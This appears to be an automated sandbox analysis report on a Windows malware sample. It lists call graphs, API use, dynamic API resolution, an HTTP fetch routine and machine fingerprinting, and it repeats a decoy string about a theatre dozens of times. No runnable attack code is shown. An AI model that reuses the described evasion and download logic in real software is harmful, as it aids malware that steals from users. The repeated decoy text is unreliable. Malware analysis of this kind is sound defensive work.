37905->37908 38124 e5aab0 37906->38124 37908->37906 37909 e5ad34 37909->37737 37911 e5abcb 37910->37911 37912 e5ac1b 37911->37912 37913 e5ac09 lstrcpy 37911->37913 37912->37749 37913->37912 38128 e56ac0 37914->38128 37916 e56c2e 37917 e56c38 sscanf 37916->37917 38157 e5ab10 37917->38157 37919 e56c4a SystemTimeToFileTime SystemTimeToFileTime 37920 e56c80 37919->37920 
37921 e56c6e 37919->37921 37923 e55d60 37920->37923 37921->37920 37922 e56c78 ExitProcess 37921->37922 37924 e55d6d 37923->37924 37925 e5aa50 lstrcpy 37924->37925 37926 e55d7e 37925->37926 38159 e5ab30 lstrlen 37926->38159 37929 e5ab30 2 API calls 37930 e55db4 37929->37930 37931 e5ab30 2 API calls 37930->37931 37932 e55dc4 37931->37932 38163 e56680 37932->38163 37935 e5ab30 2 API calls 37936 e55de3 37935->37936 37937 e5ab30 2 API calls 37936->37937 37938 e55df0 37937->37938 37939 e5ab30 2 API calls 37938->37939 37940 e55dfd 37939->37940 37941 e5ab30 2 API calls 37940->37941 37942 e55e49 37941->37942 38172 e426f0 37942->38172 37950 e55f13 37951 e56680 lstrcpy 37950->37951 37952 e55f25 37951->37952 37953 e5aab0 lstrcpy 37952->37953 37954 e55f42 37953->37954 37955 e5acc0 4 API calls 37954->37955 37956 e55f5a 37955->37956 37957 e5abb0 lstrcpy 37956->37957 37958 e55f66 37957->37958 37959 e5acc0 4 API calls 37958->37959 37960 e55f8a 37959->37960 37961 e5abb0 lstrcpy 37960->37961 37962 e55f96 37961->37962 37963 e5acc0 4 API calls 37962->37963 37964 e55fba 37963->37964 37965 e5abb0 lstrcpy 37964->37965 37966 e55fc6 37965->37966 37967 e5aa50 lstrcpy 37966->37967 37968 e55fee 37967->37968 38898 e57690 GetWindowsDirectoryA 37968->38898 37971 e5aab0 lstrcpy 37972 e56008 37971->37972 38908 e448d0 37972->38908 37974 e5600e 39053 e519f0 37974->39053 37976 e56016 37977 e5aa50 lstrcpy 37976->37977 37978 e56039 37977->37978 37979 e41590 lstrcpy 37978->37979 37980 e5604d 37979->37980 39069 e459b0 34 API calls codecvt 37980->39069 37982 e56053 39070 e51280 lstrlen lstrcpy 37982->39070 37984 e5605e 37985 e5aa50 lstrcpy 37984->37985 37986 e56082 37985->37986 37987 e41590 lstrcpy 37986->37987 37988 e56096 37987->37988 39071 e459b0 34 API calls codecvt 37988->39071 37990 e5609c 39072 e50fc0 StrCmpCA StrCmpCA StrCmpCA lstrlen lstrcpy 37990->39072 37992 e560a7 37993 e5aa50 lstrcpy 37992->37993 37994 e560c9 37993->37994 37995 e41590 lstrcpy 37994->37995 37996 e560dd 37995->37996 39073 e459b0 
34 API calls codecvt 37996->39073 37998 e560e3 39074 e51170 StrCmpCA lstrlen lstrcpy 37998->39074 38000 e560ee 38001 e41590 lstrcpy 38000->38001 38002 e56105 38001->38002 39075 e51c60 115 API calls 38002->39075 38004 e5610a 38005 e5aa50 lstrcpy 38004->38005 38006 e56126 38005->38006 39076 e45000 7 API calls 38006->39076 38008 e5612b 38009 e41590 lstrcpy 38008->38009 38010 e561ab 38009->38010 39077 e508a0 285 API calls 38010->39077 38012 e561b0 38013 e5aa50 lstrcpy 38012->38013 38014 e561d6 38013->38014 38015 e41590 lstrcpy 38014->38015 38016 e561ea 38015->38016 39078 e459b0 34 API calls codecvt 38016->39078 38018 e561f0 39079 e513c0 StrCmpCA lstrlen lstrcpy 38018->39079 38020 e561fb 38021 e41590 lstrcpy 38020->38021 38022 e5623b 38021->38022 39080 e41ec0 59 API calls 38022->39080 38024 e56240 38025 e56250 38024->38025 38026 e562e2 38024->38026 38027 e5aa50 lstrcpy 38025->38027 38028 e5aab0 lstrcpy 38026->38028 38030 e56270 38027->38030 38029 e562f5 38028->38029 38031 e41590 lstrcpy 38029->38031 38032 e41590 lstrcpy 38030->38032 38033 e56309 38031->38033 38034 e56284 38032->38034 39084 e459b0 34 API calls codecvt 38033->39084 39081 e459b0 34 API calls codecvt 38034->39081 38037 e5630f 39085 e537b0 31 API calls 38037->39085 38038 e5628a 39082 e51520 19 API calls codecvt 38038->39082 38041 e562da 38045 e41590 lstrcpy 38041->38045 38075 e5635b 38041->38075 38042 e56295 38043 e41590 lstrcpy 38042->38043 38044 e562d5 38043->38044 39083 e54010 67 API calls 38044->39083 38048 e56337 38045->38048 38047 e41590 lstrcpy 38049 e5637b 38047->38049 39086 e54300 57 API calls 2 library calls 38048->39086 39088 e549d0 88 API calls codecvt 38049->39088 38050 e41590 lstrcpy 38056 e563a0 38050->38056 38052 e563a5 38053 e563ca 38052->38053 38058 e41590 lstrcpy 38052->38058 38054 e563ef 38053->38054 38060 e41590 lstrcpy 38053->38060 38062 e56414 38054->38062 38068 e41590 lstrcpy 38054->38068 39089 e54e00 61 API calls codecvt 38056->39089 38057 e5633c 38064 e41590 lstrcpy 38057->38064 

                            Control-flow Graph

                            APIs
                            • GetProcAddress.KERNEL32(75900000,009C1680), ref: 00E59BF1
                            • GetProcAddress.KERNEL32(75900000,009C1698), ref: 00E59C0A
                            • GetProcAddress.KERNEL32(75900000,009C1530), ref: 00E59C22
                            • GetProcAddress.KERNEL32(75900000,009C1560), ref: 00E59C3A
                            • GetProcAddress.KERNEL32(75900000,009C1578), ref: 00E59C53
                            • GetProcAddress.KERNEL32(75900000,009C9888), ref: 00E59C6B
                            • GetProcAddress.KERNEL32(75900000,009B7350), ref: 00E59C83
                            • GetProcAddress.KERNEL32(75900000,009B7310), ref: 00E59C9C
                            • GetProcAddress.KERNEL32(75900000,009C1590), ref: 00E59CB4
                            • GetProcAddress.KERNEL32(75900000,009C16B0), ref: 00E59CCC
                            • GetProcAddress.KERNEL32(75900000,009C15A8), ref: 00E59CE5
                            • GetProcAddress.KERNEL32(75900000,009C16C8), ref: 00E59CFD
                            • GetProcAddress.KERNEL32(75900000,009B73B0), ref: 00E59D15
                            • GetProcAddress.KERNEL32(75900000,009C16E0), ref: 00E59D2E
                            • GetProcAddress.KERNEL32(75900000,009C1410), ref: 00E59D46
                            • GetProcAddress.KERNEL32(75900000,009B7430), ref: 00E59D5E
                            • GetProcAddress.KERNEL32(75900000,009C1428), ref: 00E59D77
                            • GetProcAddress.KERNEL32(75900000,009C17B8), ref: 00E59D8F
                            • GetProcAddress.KERNEL32(75900000,009B70F0), ref: 00E59DA7
                            • GetProcAddress.KERNEL32(75900000,009C17D0), ref: 00E59DC0
                            • GetProcAddress.KERNEL32(75900000,009B7230), ref: 00E59DD8
                            • LoadLibraryA.KERNEL32(009C1740,?,00E56CA0), ref: 00E59DEA
                            • LoadLibraryA.KERNEL32(009C1788,?,00E56CA0), ref: 00E59DFB
                            • LoadLibraryA.KERNEL32(009C1758,?,00E56CA0), ref: 00E59E0D
                            • LoadLibraryA.KERNEL32(009C1728,?,00E56CA0), ref: 00E59E1F
                            • LoadLibraryA.KERNEL32(009C1710,?,00E56CA0), ref: 00E59E30
                            • GetProcAddress.KERNEL32(75070000,009C1770), ref: 00E59E52
                            • GetProcAddress.KERNEL32(75FD0000,009C17A0), ref: 00E59E73
                            • GetProcAddress.KERNEL32(75FD0000,009C9BA0), ref: 00E59E8B
                            • GetProcAddress.KERNEL32(75A50000,009C9BE8), ref: 00E59EAD
                            • GetProcAddress.KERNEL32(74E50000,009B70D0), ref: 00E59ECE
                            • GetProcAddress.KERNEL32(76E80000,009C97D8), ref: 00E59EEF
                            • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00E59F06
                            Strings
                            • NtQueryInformationProcess, xrefs: 00E59EFA
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: NtQueryInformationProcess
                            • API String ID: 2238633743-2781105232
                            • Opcode ID: 3a12095264939aab5f1691ab47f3dad5d593b36589a37e85d16160cb333a638b
                            • Instruction ID: 5c5a3e179e80b901d71a7f1ed3b73c4fdebfdbb4d5a1816d31a12785f1298ef0
                            • Opcode Fuzzy Hash: 3a12095264939aab5f1691ab47f3dad5d593b36589a37e85d16160cb333a638b
                            • Instruction Fuzzy Hash: E1A122B5540210DFC36DDFA8EA88996F7BAA74D3017108A3AF929C3398DB7595C1CF60

                            Control-flow Graph

                            control_flow_graph 764 e44610-e446e5 RtlAllocateHeap 781 e446f0-e446f6 764->781 782 e446fc-e4479a 781->782 783 e4479f-e447f9 VirtualProtect 781->783 782->781
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00E4465F
                            • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00E447EC
                            Strings
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E447C0
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E44638
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E446FC
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E4471D
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E44688
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E44707
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E4478F
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E44667
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E446B2
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E44728
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E446D3
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E447B5
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E446BD
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E44779
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E4476E
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E447CB
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E44693
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E446C8
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E44617
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E44622
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E44643
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E446A7
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E44763
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E44784
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E4462D
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E4467D
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E4479F
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E44712
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E447AA
                            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E44672
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeapProtectVirtual
                            • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                            • API String ID: 1542196881-2218711628
                            • Opcode ID: 3e6f7d061172a1541e81bd29554a72117743052e7db1344122390cb9d550a80b
                            • Instruction ID: 18e4a62b7e2c959eb6ce30f70147126003f0e48a458e03274733a4b7b9bf7cfb
                            • Opcode Fuzzy Hash: 3e6f7d061172a1541e81bd29554a72117743052e7db1344122390cb9d550a80b
                            • Instruction Fuzzy Hash: 194105A17D37846AC634F7A4B8FDEEDB6666F63F42F907044AC2872280FAB2550045B1

                            Control-flow Graph

                            control_flow_graph 1033 e462d0-e4635b call e5aab0 call e44800 call e5aa50 InternetOpenA StrCmpCA 1040 e46364-e46368 1033->1040 1041 e4635d 1033->1041 1042 e4636e-e46392 InternetConnectA 1040->1042 1043 e46559-e46575 call e5aab0 call e5ab10 * 2 1040->1043 1041->1040 1044 e4654f-e46553 InternetCloseHandle 1042->1044 1045 e46398-e4639c 1042->1045 1061 e46578-e4657d 1043->1061 1044->1043 1047 e4639e-e463a8 1045->1047 1048 e463aa 1045->1048 1050 e463b4-e463e2 HttpOpenRequestA 1047->1050 1048->1050 1052 e46545-e46549 InternetCloseHandle 1050->1052 1053 e463e8-e463ec 1050->1053 1052->1044 1056 e46415-e46455 HttpSendRequestA HttpQueryInfoA 1053->1056 1057 e463ee-e4640f InternetSetOptionA 1053->1057 1059 e46457-e46477 call e5aa50 call e5ab10 * 2 1056->1059 1060 e4647c-e4649b call e58ad0 1056->1060 1057->1056 1059->1061 1066 e4649d-e464a4 1060->1066 1067 e46519-e46539 call e5aa50 call e5ab10 * 2 1060->1067 1070 e464a6-e464d0 InternetReadFile 1066->1070 1071 e46517-e4653f InternetCloseHandle 1066->1071 1067->1061 1076 e464d2-e464d9 1070->1076 1077 e464db 1070->1077 1071->1052 1076->1077 1080 e464dd-e46515 call e5acc0 call e5abb0 call e5ab10 1076->1080 1077->1071 1080->1070
                            APIs
                              • Part of subcall function 00E5AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E5AAF6
                              • Part of subcall function 00E44800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E44889
                              • Part of subcall function 00E44800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E44899
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                            • InternetOpenA.WININET(00E60DFF,00000001,00000000,00000000,00000000), ref: 00E46331
                            • StrCmpCA.SHLWAPI(?,009CF3B0), ref: 00E46353
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E46385
                            • HttpOpenRequestA.WININET(00000000,GET,?,009CE8D8,00000000,00000000,00400100,00000000), ref: 00E463D5
                            • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00E4640F
                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E46421
                            • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00E4644D
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00E464BD
                            • InternetCloseHandle.WININET(00000000), ref: 00E4653F
                            • InternetCloseHandle.WININET(00000000), ref: 00E46549
                            • InternetCloseHandle.WININET(00000000), ref: 00E46553
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                            • String ID: ERROR$ERROR$GET
                            • API String ID: 3749127164-2509457195
                            • Opcode ID: f01b83815bf4cff82686ca8089003a62f7b247413964c2bbe084d474806b9484
                            • Instruction ID: a49c380f83d00d4025c9d9517d9dd1ad60cd76091b254798764600aa91844a8a
                            • Opcode Fuzzy Hash: f01b83815bf4cff82686ca8089003a62f7b247413964c2bbe084d474806b9484
                            • Instruction Fuzzy Hash: E6717E71A00218ABDF24DF90DC55BEEB7B5BB44700F1095A8F50A7B1C4DBB46A84CF52

                            Control-flow Graph

                            control_flow_graph 1356 e57690-e576da GetWindowsDirectoryA 1357 e576e3-e57757 GetVolumeInformationA call e58e90 * 3 1356->1357 1358 e576dc 1356->1358 1365 e57768-e5776f 1357->1365 1358->1357 1366 e57771-e5778a call e58e90 1365->1366 1367 e5778c-e577a7 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 e577a9-e577b6 call e5aa50 1367->1369 1370 e577b8-e577e8 wsprintfA call e5aa50 1367->1370 1377 e5780e-e5781e 1369->1377 1370->1377
                            APIs
                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00E576D2
                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E5770F
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E57793
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00E5779A
                            • wsprintfA.USER32 ref: 00E577D0
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                            • String ID: :$C$\
                            • API String ID: 1544550907-3809124531
                            • Opcode ID: 53d4df023e5db1bc34fba5b55702624d20cc5aaa26132192441bca89ebef2f28
                            • Instruction ID: 252aff486808ecc2f927bfe93b92bc92eb7d796408c9d07233aa2f3969839282
                            • Opcode Fuzzy Hash: 53d4df023e5db1bc34fba5b55702624d20cc5aaa26132192441bca89ebef2f28
                            • Instruction Fuzzy Hash: 2941C3B1D043589BDB10DF94DD45BDEBBB8AF08705F100499FA09BB280D7746A88CBA5
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00E411B7), ref: 00E57A10
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00E57A17
                            • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00E57A2F
